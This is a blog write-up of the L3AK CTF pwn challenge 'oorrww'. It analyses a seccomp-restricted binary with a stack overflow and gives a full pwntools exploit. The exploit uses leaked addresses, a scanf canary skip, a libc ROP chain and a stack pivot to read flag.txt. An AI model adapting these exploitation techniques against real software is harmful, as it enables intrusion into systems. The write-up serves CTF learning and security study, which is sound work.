🔻 ihuomtia's blog

Search

SearchSearch

L3AK CTF [PWN] oorrww

May 26, 20249 min read

In this challenge, we’ll use the ORW technique to extract the flag since we’re unable to access a shell because of seccomp limitations. We’ll encode the addresses as double (float) values and construct a series of ROP chains to display the flag.

Hint

The name of the challenge hints at the solution, oorrww. Notice the doubling of each character, indicating that we’ll need to send addresses as double float values, and the characters orw corresponds to the ORW (Open, Read, Write) technique.

Description

Analysis

We are presented with 64bit linux binary:

$ file ./oorrww  
./oorrww: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=2fcec0bbe06cb0addd4427a68  
c689c55add287af, for GNU/Linux 3.2.0, not stripped

And all mitigations are enabled:

$ pwn checksec --file ./oorrww  
   Arch:     amd64-64-little  
   RELRO:    Full RELRO  
   Stack:    Canary found  
   NX:       NX enabled  
   PIE:      PIE enabled

Decompiling the binary in Ghidra, here’s the main function:

undefined8 main(EVP_PKEY_CTX *param_1) {
  long in_FS_OFFSET;
  int i;
  undefined buffer [152];
  long canary;
  
  canary = *(long *)(in_FS_OFFSET + 0x28);
  init(param_1);
  sandbox();
  gifts(buffer);
  for (i = 0; i < 0x16; i = i + 1) {
    puts("input:");
    __isoc99_scanf(&%lf,buffer + (i << 3));
  }
  if (canary != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return 0;
}

The function sandbox setups the seccomp restrictions

void sandbox(void) {
  long lVar1;
  undefined8 uVar2;
  long in_FS_OFFSET;
  
  lVar1 = *(long *)(in_FS_OFFSET + 0x28);
  uVar2 = seccomp_init(0x7fff0000);
  seccomp_rule_add(uVar2,0,0x3b,0);
  seccomp_rule_add(uVar2,0,0x142,0);
  seccomp_load(uVar2);
  if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

And the gifts function leaks some addresses for us.

 
void gifts(undefined8 param_1) {
  long lVar1;
  long in_FS_OFFSET;
  
  canary = *(long *)(in_FS_OFFSET + 0x28);
  printf("here are gifts for you: %.16g %.16g!\n",param_1,__isoc99_scanf);
  if (canary != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

Using seccomp-tools let’s check what does seccomp restrict in this binary:

$ seccomp-tools dump ./oorrww  
line  CODE  JT   JF      K  
=================================  
0000: 0x20 0x00 0x00 0x00000004  A = arch  
0001: 0x15 0x00 0x06 0xc000003e  if (A != ARCH_X86_64) goto 0008  
0002: 0x20 0x00 0x00 0x00000000  A = sys_number  
0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005  
0004: 0x15 0x00 0x03 0xffffffff  if (A != 0xffffffff) goto 0008  
0005: 0x15 0x02 0x00 0x0000003b  if (A == execve) goto 0008  
0006: 0x15 0x01 0x00 0x00000142  if (A == execveat) goto 0008  
0007: 0x06 0x00 0x00 0x7fff0000  return ALLOW  
0008: 0x06 0x00 0x00 0x00000000  return KILL

Apparently we can’t use execve or execveat, so basically we can’t execute any shell command.

Solution

Getting back to the main function, we can see that it takes input using scanf, expecting a double (long float), and then stores this number in the buffer. The buffer has 152 bytes, while the loop reads 0x16 * 8 (176) bytes, resulting in a buffer overflow. The expression (i << 3) shifts the value of i by 3 bits, effectively multiplying i by 

// this snippet is simplified
char buffer [152];
for (i = 0; i < 0x16; i = i + 1) {
    puts("input:");
    scanf("%lf",buffer + (i << 3));
}

And the function gifts leaks the address of the buffer and the address of scanf which’ll effectively allow us to obtain the base address of libc, but the catch is that it leaks the addresses in a double float format %.16g, so we’ll need to convert them to a usable format.

// this snippet is simplified
printf("here are gifts for you: %.16g %.16g!\n",buffer,scanf);

Intuitively the first thing we need in our exploit is a way to convert back and forth from long to double types, and here’s some Python functions that do exactly that:

import struct
 
def double2long(a):
    packed = struct.pack('d', a)
    unpacked = struct.unpack('q', packed)[0]
    return unpacked
 
def long2double(a):
    packed = struct.pack('q', a)
    unpacked = struct.unpack('d', packed)[0]
    return unpacked

So the plan is as follows:

  • Get libc address and buffer address
  • Store flag.txt string the buffer address
  • Call open syscall to open flag.txt
  • Call read to read the flag
  • Print the flag to stdout

And here’s the limitations:

  • We have only 0x16 * 8 in memory, will it be enough?
  • We have to deal with the canary

To handle the stack canary, we can simply send the - character as input. The scanf function will ignore the - character and will not write it to the address provided. This way, we avoid overwriting the canary, making sure that the stack integrity check passes.

First let’s grab the gifts, and get libc base address as well as the buffer address:

gifts = io.recvuntil(b'!').split(b' ')[-2:]
scanf_address = double2long(eval(gifts[1][:-1]))
buffer_address = double2long(eval(gifts[0]))
 
libc.address = scanf_address - 0x62090 # subtracting libc offset
 
log.success(f"Got gifts: libc at (0x{libc.address:x}) buffer at (0x{buffer_address:x})")

Then we’ll need to store flag.txt into memory, to do that we convert the string to its hexadecimal representation and then send it as double values to the binary’s input, after that we’ll send null bytes to terminate the C string:

payload = [
    # store "flag.txt" in memory
    0x7478742e67616c66,
    0x0
    ]

After that we’ll need to call open to open the file and to obtain a file descriptor, that will be used later to read the file.

payload += [
	# opening "flag.txt" in reading mode
    libc.address + MOV_RAX_2,
    libc.address + POP_RDI_RET,
    buffer_address,
    libc.address + POP_RSI_RET,
    0,
    libc.address + SYSCALL,
]

Next up, we call the syscall, basically reading 0x40 bytes from the opened file, I chose this length because I think the flag we’ll be smaller, to keep the payload size small I have tested and found out the obtained file descriptor was 3 , so I’ll just hard-code it into the payload (note: this may not work all the time), the read flag will be stored in the address pointed by RSI which in this case buffer_address - 0x80 .

payload += [
    # reading 0x40 bytes from "flag.txt"
    libc.address + POP_RDX_RBX_RET,
    0x40,
    0,
    libc.address + POP_RDI_RET,
    3, # we assumed that this is the file descriptor stored in rax
    libc.address + XOR_RAX,
    libc.address + POP_RSI_RET,
    buffer_address - 0x80, # the flag will be stored in this address
    libc.address + SYSCALL,
]

Using a single gadget we move the address that is stored in RSP to RDI. RDI is the first argument for the next call which is a call to puts to print out the flag to stdout.

payload += [
    # calling puts to print out the flag
    libc.address + MOV_RDI_RSI_ETC,
    libc.symbols['puts'],
    ]

NOTE

Obviously I had to do a lot of trial and error before I got this final payload, most of the failed attempts were because I didn’t have enough space to put the payload in, first I tried to use the write syscall but it took more space so I optimized by using the puts function, then I found gadgets in libc that moves values that I want to RAX register which reduced the size of the payload.

After setting up the payload, it’s time to start interacting with the binary, first we’ll fill the buffer with our payload:

for i in range(0, 19):
    io.recvuntil(b'input:')
    io.sendline(f"{long2double(payload[i])}".encode())

Then we’ll skip the canary value to avoid smashing the stack

# Avoiding overwriting the canary
io.recvuntil(b'input:')
io.sendline(b"-")

After that we’ll overwrite the RBP register value to point to the start of the payload, we add 8 bytes to skip the nullbytes that come after the “flag.txt” string:

io.recvuntil(b'input:')
io.sendline(f"{long2double(buffer_address+8)}".encode())

Follows up is stack pivot, where we simply change the stack to point to the start of the buffer, and the return to the address in the top of the current stack:

io.recvuntil(b'input:')
io.sendline(f"{long2double(libc.address + LEAVE_RET)}".encode())

TIP

The instruction leave is equivalent to mov rsp, rbp; pop rbp; ret.

After running the exploit, here’s the output:

[+] Starting local process './oorrww': pid 306035  
[+] Got gifts: libc at (0x7807a2800000) buffer at (0x7ffd980edaf0)  
[+] Got the flag: : b'L3AK{th3_d0ubl3d_1nput_r3turns_whAt_u_wAnt}\n\xfd\x7f'  
[*] Stopped process './oorrww_patched' (pid 306035)

And we got our flag: L3AK{th3_d0ubl3d_1nput_r3turns_whAt_u_wAnt}

Full exploit

from pwn import *
import struct
 
def start(argv=[], *a, **kw):
    if args.GDB:
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:
        return process([exe] + argv, *a, **kw)
 
# -------------------------------- initial configurations
gdbscript = '''
init-pwndbg
set debuginfod enabled off
'''.format(**locals())
 
exe = './oorrww'
elf = context.binary = ELF(exe, checksec=False)
context.log_level = 'info'
io = start()
libc = ELF("./libc.so.6", checksec=False)
 
def double2long(a):
    packed = struct.pack('d', a)
    unpacked = struct.unpack('q', packed)[0]
    return unpacked
 
def long2double(a):
    packed = struct.pack('q', a)
    unpacked = struct.unpack('d', packed)[0]
    return unpacked
 
# -------------------------------- payload
 
POP_RDI_RET = 0x000000000002a3e5 # pop rdi; ret;
POP_RAX_RET = 0x0000000000045eb0 # pop rax; ret;
POP_RSI_RET = 0x000000000002be51 # pop rsi; ret;
SYSCALL = 0x0000000000091316 # syscall; ret;
RET = 0x0000000000029139 # ret;
POP_RDX_RBX_RET = 0x00000000000904a9 # pop rdx; pop rbx; ret;
MOV_RAX_2 = 0x00000000000d8380 # mov rax, 2; ret;
MOV_RAX_1 = 0x00000000000d8370 # mov rax, 1; ret;
MOV_RDI_RSI_ETC = 0x00000000001a24fe # mov rdi, rsi; and eax, 0x11111111; bsr eax, eax; lea rax, [rdi + rax - 0x20]; vzeroupper; ret;
XOR_RAX = 0x00000000000baaf9 # xor rax, rax; ret;
LEAVE_RET = 0x000000000004da83 # leave; ret;
 
 
# -------------------------------- run exploit
 
gifts = io.recvuntil(b'!').split(b' ')[-2:]
scanf_address = double2long(eval(gifts[1][:-1]))
buffer_address = double2long(eval(gifts[0]))
 
libc.address = scanf_address - 0x62090
 
log.success(f"Got gifts: libc at (0x{libc.address:x}) buffer at (0x{buffer_address:x})")
 
payload = [
    # store "flag.txt" in memory
    0x7478742e67616c66,
    0x0,
 
    # opening "flag.txt" in reading mode
    libc.address + MOV_RAX_2,
    libc.address + POP_RDI_RET,
    buffer_address,
    libc.address + POP_RSI_RET,
    0,
    libc.address + SYSCALL,
 
    # reading 0x40 bytes from "flag.txt"
    libc.address + POP_RDX_RBX_RET,
    0x40,
    0,
    libc.address + POP_RDI_RET,
    3, # we assumed that this is the file descriptor stored in rax
    libc.address + XOR_RAX,
    libc.address + POP_RSI_RET,
    buffer_address - 0x80, # the flag will be stored in this address
    libc.address + SYSCALL,
 
    # calling puts to print out the flag
    libc.address + MOV_RDI_RSI_ETC,
    libc.symbols['puts'],
    ]
 
for i in range(0, 19):
    io.recvuntil(b'input:')
    io.sendline(f"{long2double(payload[i])}".encode())
 
 
# Avoiding overwriting the canary
io.recvuntil(b'input:')
io.sendline(b"-")
 
io.recvuntil(b'input:')
io.sendline(f"{long2double(buffer_address+8)}".encode())
 
io.recvuntil(b'input:')
io.sendline(f"{long2double(libc.address + LEAVE_RET)}".encode())
 
log.success(f"Got the flag: : {io.clean().strip()}")